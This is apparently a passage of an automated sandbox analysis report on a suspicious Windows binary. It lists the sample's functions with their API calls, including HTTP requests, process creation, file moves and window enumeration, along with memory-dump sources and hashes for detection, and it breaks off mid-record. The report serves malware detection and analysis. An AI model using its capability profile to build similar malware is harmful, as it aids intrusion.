Part of subcall function 004B7CF4: __mtinitlocknum.LIBCMT ref: 004B7D06
Part of subcall function 004B7CF4: RtlEnterCriticalSection.NTDLL(00000000), ref: 004B7D1F

__calloc_crt.LIBCMT ref: 004BACD2

Part of subcall function 004B6986: __calloc_impl.LIBCMT ref: 004B6995
Part of subcall function 004B6986: Sleep.KERNEL32(00000000,000003BC,004AF507,?,0000000E), ref: 004B69AC

@_EH4_CallFilterFunc@8.LIBCMT ref: 004BACED
GetStartupInfoW.KERNEL32(?,00546E28,00000064,004B5E91,00546C70,00000014), ref: 004BAD46
__calloc_crt.LIBCMT ref: 004BAD91
GetFileType.KERNEL32(00000001), ref: 004BADD8
InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 004BAE11

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
String ID:
API String ID: 1426640281-0
Opcode ID: e7ce171b48a65e3a425a76a3d2b72af341d571adeac2585f7fe0832c0d54263e
Instruction ID: b77daa0505cee882ed724df186435ab27371c0fde610eeae2cfcdd44c7dbd888
Opcode Fuzzy Hash: e7ce171b48a65e3a425a76a3d2b72af341d571adeac2585f7fe0832c0d54263e
Instruction Fuzzy Hash: 4981E3719053458FDB24CF68C8805EEBBF0AF16324B24425ED4A6AB3D1C738D817DB6A

Function 004D67E9 Relevance: 15.1, APIs: 10, Instructions: 107windowCOMMON

Download Yara Rule

APIs

__swprintf.LIBCMT ref: 004D67FD
__swprintf.LIBCMT ref: 004D680A

Part of subcall function 004B172B: __woutput_l.LIBCMT ref: 004B1784

FindResourceW.KERNEL32(?,?,0000000E), ref: 004D6834
LoadResource.KERNEL32(?,00000000), ref: 004D6840
LockResource.KERNEL32(00000000), ref: 004D684D
FindResourceW.KERNEL32(?,?,00000003), ref: 004D686D
LoadResource.KERNEL32(?,00000000), ref: 004D687F
SizeofResource.KERNEL32(?,00000000), ref: 004D688E
LockResource.KERNEL32(?), ref: 004D689A
CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 004D68F9

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
String ID:
API String ID: 1433390588-0
Opcode ID: 1fced03fcce7a4dd89a23df49dd4ac6ca8a9ec12c0a7c1e284775ae03115727b
Instruction ID: fd736582d302aaba35d88caa67709fe64590d2dc0fd90462175b72f83b70736f
Opcode Fuzzy Hash: 1fced03fcce7a4dd89a23df49dd4ac6ca8a9ec12c0a7c1e284775ae03115727b
Instruction Fuzzy Hash: CE31827590121AABDB10AF61DD65AFF7BB8EF08341B018427F911D2250E738D915EB74

Function 004D4025 Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 004D4047
GetForegroundWindow.USER32(00000000,?,?,?,?,?,004D30A5,?,00000001), ref: 004D405B
GetWindowThreadProcessId.USER32(00000000), ref: 004D4062
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,004D30A5,?,00000001), ref: 004D4071
GetWindowThreadProcessId.USER32(?,00000000), ref: 004D4083
AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,004D30A5,?,00000001), ref: 004D409C
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,004D30A5,?,00000001), ref: 004D40AE
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,004D30A5,?,00000001), ref: 004D40F3
AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,004D30A5,?,00000001), ref: 004D4108
AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,004D30A5,?,00000001), ref: 004D4113

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: 50b1d9c6af58fc1eba208be99155d343c1bf4e41d4635a22ec7c1ef708ae94cf
Instruction ID: 07d1ed9516487cd68208d269e2e7ab4caf871d85ece96e700bc7720b13fb1239
Opcode Fuzzy Hash: 50b1d9c6af58fc1eba208be99155d343c1bf4e41d4635a22ec7c1ef708ae94cf
Instruction Fuzzy Hash: AD318171500204ABDB11DB54DC69BAE77B9AFB4352F10C017F909D6390CBB89D88AB68

Function 004CCB82 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 239COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32(?,004CCF50), ref: 004CCE90

Strings

INSTANCE, xrefs: 004CCD9E
CLASS, xrefs: 004CCC10
NAME, xrefs: 004CCCC2
REGEXPCLASS, xrefs: 004CCC56
CLASSNN, xrefs: 004CCC33
TEXT, xrefs: 004CCDC7

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: ChildEnumWindows
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 3555792229-1603158881
Opcode ID: 1b3e9b1054333c48f9df1cceb526fc153d984e01a8d1f4c47ebd8b2a7a1e87ea
Instruction ID: ae11abc2f3fe497c56561f39335a42e5b1cd730a175fe29c3c63e3364d3def7e
Opcode Fuzzy Hash: 1b3e9b1054333c48f9df1cceb526fc153d984e01a8d1f4c47ebd8b2a7a1e87ea
Instruction Fuzzy Hash: FE918F34600106AACB58EF61C4C1BEAFB65FF05308F50852FE45EA7251DF38695ADBE8

Function 00493093 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 210COMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 004930DC
CoUninitialize.COMBASE ref: 00493181
UnregisterHotKey.USER32(?), ref: 004932A9
DestroyWindow.USER32(?), ref: 00505079
FreeLibrary.KERNEL32(?), ref: 005050F8
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00505125

Strings

close all, xrefs: 004930D7

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: 59922bedb7fdef349c9039961517d3ce68dba55f1303af7b1ac4938b87492d38
Instruction ID: 78cc560b4fb6b09a0a11873a9a39bb80a72857add7523b892d54722facd452a5
Opcode Fuzzy Hash: 59922bedb7fdef349c9039961517d3ce68dba55f1303af7b1ac4938b87492d38
Instruction Fuzzy Hash: 3C9150346001029FCB15EF15D899B69FBB4FF15309F5481BEE40A672A2DB38AE16CF58

Function 004ACB8D Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 185windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 004ACC15

Part of subcall function 004ACCCD: GetClientRect.USER32(?,?), ref: 004ACCF6
Part of subcall function 004ACCCD: GetWindowRect.USER32(?,?), ref: 004ACD37
Part of subcall function 004ACCCD: ScreenToClient.USER32(?,?), ref: 004ACD5F

GetDC.USER32 ref: 0050D137
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0050D14A
SelectObject.GDI32(00000000,00000000), ref: 0050D158
SelectObject.GDI32(00000000,00000000), ref: 0050D16D
ReleaseDC.USER32(?,00000000), ref: 0050D175
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0050D200

Strings

U, xrefs: 0050D0D5

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: 9dac8acb984eede6d1d2087e97c94d5837c63bbc850106270f21537ba1aeab07
Instruction ID: 5a23a46b94b0e6ceb78bac387537783ebf697971ed335cde3310025a0c58d76a
Opcode Fuzzy Hash: 9dac8acb984eede6d1d2087e97c94d5837c63bbc850106270f21537ba1aeab07
Instruction Fuzzy Hash: 5371FD30400209DFCF218FA4C895AEE7FB1FF69324F18462AED595A2A6DB358841DF64

Function 004F9A75 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 142windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004F9B19
SendMessageW.USER32(?,00001036,00000000,?), ref: 004F9B2D
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004F9B47
_wcscat.LIBCMT ref: 004F9BA2
SendMessageW.USER32(?,00001057,00000000,?), ref: 004F9BB9
SendMessageW.USER32(?,00001061,?,0000000F), ref: 004F9BE7

Strings

SysListView32, xrefs: 004F9AEB
-----, xrefs: 004F9B9A

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: MessageSend$Window_wcscat
String ID: -----$SysListView32
API String ID: 307300125-3975388722
Opcode ID: fc904504f1062c83e69a5686fe6e5f63b828798af0efb914648a8d12a17260c0
Instruction ID: e482f47e1f5fe0a1909c5cd12c870849df37c4906c27140e5c974bd448e0dfaa
Opcode Fuzzy Hash: fc904504f1062c83e69a5686fe6e5f63b828798af0efb914648a8d12a17260c0
Instruction Fuzzy Hash: FD41C17090034CABDB219FA4CC85BEF7BB8EF08354F10442AF645A7291C7759D84CB68

Function 004E45C4 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 133networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 004E45FF
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 004E462B
InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 004E466D
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 004E4682
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004E468F
HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 004E46BF
InternetCloseHandle.WININET(00000000), ref: 004E4706

Part of subcall function 004E5052: GetLastError.KERNEL32(?,?,004E43CC,00000000,00000000,00000001), ref: 004E5067

Strings

, xrefs: 004E46B8

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
String ID:
API String ID: 1241431887-3916222277
Opcode ID: 21ed8ca2370ab777d532961f6ed31bec80c885603e8adfd9b2802f6e74aa4913
Instruction ID: ab3f4d23bfbc4242cedffb6b61b139a79e5404d45b779639c9b4628760d36de7
Opcode Fuzzy Hash: 21ed8ca2370ab777d532961f6ed31bec80c885603e8adfd9b2802f6e74aa4913
Instruction Fuzzy Hash: D34180B1500204BFEB119F61CC89FFB77ACFF49315F00401AFA059A181D77899449BA8

Function 004EB644 Relevance: 13.9, APIs: 9, Instructions: 432COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,?,0052DC00), ref: 004EB715
FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0052DC00), ref: 004EB749
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 004EB8C1
SysFreeString.OLEAUT32(?), ref: 004EB8EB

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: Free$FileLibraryModuleNamePathQueryStringType
String ID:
API String ID: 560350794-0
Opcode ID: 788454327095b324498c4c3a5394544f7bee41f090a4f986b389768cfd4ef777
Instruction ID: 64fea2dd3c358dc4675354243361bbc9f5a04df9467d38506d771d35b7fbc509
Opcode Fuzzy Hash: 788454327095b324498c4c3a5394544f7bee41f090a4f986b389768cfd4ef777
Instruction Fuzzy Hash: CFF13C71A00209EFCF04DF95C884EAEB7B9FF49315F1084AAF905AB250DB35AD45CB94

Function 004F24D4 Relevance: 13.9, APIs: 9, Instructions: 376processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004F24F5
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 004F2688
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 004F26AC
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 004F26EC
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 004F270E
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 004F286F
GetLastError.KERNEL32(00000000,00000001,00000000), ref: 004F28A1
CloseHandle.KERNEL32(?), ref: 004F28D0
CloseHandle.KERNEL32(?), ref: 004F2947

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
String ID:
API String ID: 4090791747-0
Opcode ID: 4e4efd94aa1838cb2d7638b469e5c3b9a7a124e8aecea250949aa8c76f0aa034
Instruction ID: aadb8b81d59778192fe97ae0f7c495e33ea1fec39fcea561e595350a7bc9ddfd
Opcode Fuzzy Hash: 4e4efd94aa1838cb2d7638b469e5c3b9a7a124e8aecea250949aa8c76f0aa034
Instruction Fuzzy Hash: 9BD1DF31604200DFCB14EF25C591A6ABBE0BF89314F14856EF9899B3A2DB79DC44CB5A

Function 004AB73E Relevance: 13.7, APIs: 9, Instructions: 170timeCOMMON

Download Yara Rule

APIs

Part of subcall function 004AB9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,004AB759,?,00000000,?,?,?,?,004AB72B,00000000,?), ref: 004ABA58

DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,004AB72B), ref: 004AB7F6
KillTimer.USER32(00000000,?,00000000,?,?,?,?,004AB72B,00000000,?,?,004AB2EF,?,?), ref: 004AB88D
DestroyAcceleratorTable.USER32(00000000), ref: 0050D8A6
DeleteObject.GDI32(00000000), ref: 0050D91C

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: Destroy$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 2402799130-0
Opcode ID: 62f11d49ce4ca1a8f2ef63629a1f87ffc0e3691250555ccd3ec4ab0c989aca96
Instruction ID: a05322ba77f3355e253c48e2359989ebd3f4df58b0687fa0b2f8f03a1fd57b98
Opcode Fuzzy Hash: 62f11d49ce4ca1a8f2ef63629a1f87ffc0e3691250555ccd3ec4ab0c989aca96
Instruction Fuzzy Hash: D261C130500B00DFDB259F58D898B29BBF5FF76316F14441EE04246AB1C778A884EF98

Function 004FB33A Relevance: 13.7, APIs: 9, Instructions: 167COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 004FB3F4

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 742f26f8fe98a48f365f6009eb1c4f51db798da8af8738af491677d46d8407eb
Instruction ID: 3254bf3ee14a54f09a3d948f28502de04c6f11f51735f1d0caf3a02b2f04e9e7
Opcode Fuzzy Hash: 742f26f8fe98a48f365f6009eb1c4f51db798da8af8738af491677d46d8407eb
Instruction Fuzzy Hash: 1F51C23154020CBBEF209F29CC85BBA3B65EB06318F648117FB15D66E2C779E9409AD9

Function 004AA699 Relevance: 13.7, APIs: 9, Instructions: 163windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0050DB1B
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0050DB3C
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0050DB51
ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0050DB6E
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0050DB95
DestroyCursor.USER32(00000000), ref: 0050DBA0
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0050DBBD
DestroyCursor.USER32(00000000), ref: 0050DBC8

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: CursorDestroyExtractIconImageLoadMessageSend
String ID:
API String ID: 3992029641-0
Opcode ID: 87d40f497bf124a9a33eb012a6e6fa58e71e49830729b1d6d0b03064397387a6
Instruction ID: 313bbbeb9be0664a5dfce8e2f8a55a0d74cd553dc77a45d5ac4b15fe16be3488
Opcode Fuzzy Hash: 87d40f497bf124a9a33eb012a6e6fa58e71e49830729b1d6d0b03064397387a6
Instruction Fuzzy Hash: FF518A34600208EFDB20DF69CC91FAA7BB5BB29354F10451AF9469A2D0D7B4EC90DB65

Function 004D7555 Relevance: 13.6, APIs: 9, Instructions: 142filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 004D6EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,004D5FA6,?), ref: 004D6ED8

Part of subcall function 004D6EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,004D5FA6,?), ref: 004D6EF1

Part of subcall function 004D72CB: GetFileAttributesW.KERNEL32(?,004D6019), ref: 004D72CC

lstrcmpiW.KERNEL32(?,?), ref: 004D75CA
_wcscmp.LIBCMT ref: 004D75E2
MoveFileW.KERNEL32(?,?), ref: 004D75FB

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
String ID:
API String ID: 793581249-0
Opcode ID: 614835ff346ce10ed5d9bce1e5baedc2d77adfd04c7b626e29a330337d125816
Instruction ID: 4fc4d7a6f57d1778d14692043bb1ce948aeae781bf1aa0bbb3aac2ab28304368
